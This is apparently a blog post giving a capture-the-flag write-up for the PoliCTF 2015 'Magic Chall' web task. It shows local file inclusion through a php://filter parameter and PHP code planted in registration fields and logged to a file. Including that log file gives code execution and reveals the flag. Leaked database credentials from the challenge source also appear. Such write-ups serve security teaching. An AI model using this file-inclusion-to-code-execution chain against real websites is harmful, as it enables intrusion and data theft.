หน้าเว็บ

วันอาทิตย์ที่ 12 กรกฎาคม พ.ศ. 2558

PoliCTF 2015: Magic Chall (Web) Write-up


Description:
I visit this website when I'm sad, contains many magical things that help me to find the solution. Focused on  your problem and find "the magic thing" that will help you to solve it.
Solution:

1. Go to http://magic.polictf.it/index.php?page=register, and I try Local File Inclusion in "page" parameter with base64 encode php filter.
Ex. http://magic.polictf.it/index.php?page=php://filter/convert.base64-encode/resource=index, and read all php file.



2. /index.php file. 
if(isset($_POST["login"])){
 if(isset($_POST["username"]) && isset($_POST["password"]) && !is_array($_POST["username"]) && !is_array($_POST["password"])){
  $user = new User($_POST["username"], $_POST["password"]);
  $login = $user -> login();
  if($login){
   $logger = new Logger(gethostbyaddr($_SERVER["REMOTE_ADDR"]), $user);
   $logger -> log_access();
   header("Location: magic_things.php");
  }
 }
}
gethostbyaddr function *0*, I go to http://ipinfo.io/ and get my hostname. :)

3. /classes/logger/logger.php, in __construct I see...
 public function __construct($host, $user){
  $this -> host = $host;
  $this -> filename = $_SERVER["DOCUMENT_ROOT"]."log/" . $host . "_" . $user->getSurname();
  $this -> user = $user;
  date_default_timezone_set("UTC");
 } 
log_access() function and initLogFile() function have fwrite to write log file. It mean in /log folder have a log file name will concat my hostname and underscore and surname (in register)
Ex. http://magic.polictf.it/log/ppp-127.0.0.1.revip8.asianet.co.th_surname

I can write file :D

4. back to index.php
  <div id="content">
   <?php 
    include($page.".php");
   ?>
  </div>
include function can be execute php code!!
in "surname" field I set to name.php.

5. In "name" and "surname" field I can set to php code. Ex. <?php phpinfo(); ?>, and I select to set php code in "name" field.
 public function log_access(){
  $active = $this -> user -> isActive();
  if(!$active){
   $this -> initLogFile();
  }
  $fo = fopen($this -> filename, 'a');
  if($fo){
   $write = fwrite($fo, date('l jS \of F Y h:i:s A') . " - " . $this -> user -> getUsername() .": log in success\n");
   fclose($fo);
   if($write)
    return true;
   else
    return false;
  }
 }
 
 public function initLogFile(){
  $fo = fopen($this -> filename, 'w+');
  if($fo){
   $write = fwrite($fo, "name|".$this -> user -> getName().";surname|".$this->user->getSurname().";date_creation|UTC:".date('l jS \of F Y h:i:s A')."\n");//write header in logfile.
   fclose($fo);
   if($write){
    $this -> user -> setActiveBit(1);
    return true;
   }
   else
    return false;
  }
 }
6. In /classes/magic/magic.php, I just LFI to Remote code execution to call __call function.
 public function __call($iveNeverSeenAnythingSoMagical, $magicArguments) {
  $mysqli = new mysqli("localhost", "magic", "nrqdUz4PMKNFZ7iphnzE", "magicchall");
  $stmt = $mysqli->prepare("SELECT word FROM magic_word");
  $stmt -> execute();
  $stmt -> store_result();
  $stmt -> bind_result($magic_word);
  $stmt -> fetch();
  echo "I THINK THIS IS THE VERY MAGIC THING: " . $magic_word;
  session_destroy();
 }

Exploitation:

Step 1: Register - http://magic.polictf.it/index.php?page=register

Name: <?php $magic = new Magic(); $magic->__call(); ?>
Surname: icheernoom.php
User: icheernoom
Password: icheernoom

Step 2: Login - http://magic.polictf.it/index.php?page=login

User: icheernoom
Password: icheernoom

Step 3: Access to http://magic.polictf.it/index.php?page=log/ppp-127.0.0.1.revip8.asianet.co.th_icheernoom

Get a flag!
  <div id="content">
   name|I THINK THIS IS THE VERY MAGIC THING: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()};surname|icheernoom.php;date_creation|UTC:Saturday 11th of July 2015 06:52:15 PM
Saturday 11th of July 2015 06:52:15 PM - icheernoom: log in success
  </div>
My Automate Script:


Explorer:



and more...

Flag: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()}

ไม่มีความคิดเห็น:

โพสต์ความคิดเห็น